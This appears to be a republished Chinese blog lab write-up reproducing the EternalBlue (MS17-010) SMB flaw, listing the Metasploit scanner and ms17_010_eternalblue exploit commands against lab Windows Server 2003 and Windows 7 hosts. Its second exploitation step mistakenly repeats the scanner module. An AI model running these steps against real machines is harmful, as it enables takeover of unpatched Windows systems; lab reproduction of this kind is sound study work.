永恒之蓝(MS17010)漏洞复现

永恒之蓝(MS17010)漏洞复现文章目录介绍:准备开始复现正式开始利用介绍:永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序准备1.kali的ip:192.168.0.1282.WindowsServer

大家好,又见面了,我是你们的朋友全栈君。

介绍:

永恒之蓝是指黑客团体Shadow Brokers公布的大批网络攻击工具,其中就包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞来获取系统最高权限。

恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,就可以进行非法操作。

准备

1.kali的ip:192.168.0.128
在这里插入图片描述
2.WindowsServer2003的ip:192.168.0.200
在这里插入图片描述
3.测试连通性:
在这里插入图片描述
在这里插入图片描述

开始复现

1.kali进入msf。 命令:msfconsole
在这里插入图片描述
2.search ms17-010 #搜索ms17010
在这里插入图片描述

  • use auxiliary/scanner/smb/smb_ms17_010 #使用模块
  • show options #显示选项
    在这里插入图片描述
  • set RHOSTS 192.168.0.200 # 设置目标主机
    在这里插入图片描述
  • 输入run或者exploit执行
  • 发现存在漏洞
    在这里插入图片描述

3.通过使用exploit/windows/smb/ms17_010_eternalblue模块进行漏洞攻击

  • use exploit/windows/smb/ms17_010_eternalblue
  • set rhosts 192.168.0.200 #设置被攻击端IP
  • run #执行

在这里插入图片描述
发现这个exp只能对64位的系统执行攻击。惨兮兮!!
哎,重来吧。
win7ip:192.168.0.129在这里插入图片描述
测试连通也没问题

正式开始利用

  1. use auxiliary/scanner/smb/smb_ms17_010 # 使用模块
    set rhosts 192.168.0.129 #设置目标IP
    run
    在这里插入图片描述
    发现存在漏洞。
    2.漏洞利用
  • use auxiliary/scanner/smb/smb_ms17_010
  • set rhosts 192.168.0.129
  • run
    在这里插入图片描述
    发现攻击成功。
    然后就可以为所欲为了。
    在这里插入图片描述
    发现有乱码,可以使用chcp 65001命令消除乱码。
    在这里插入图片描述
    至此复现结束。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/135847.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号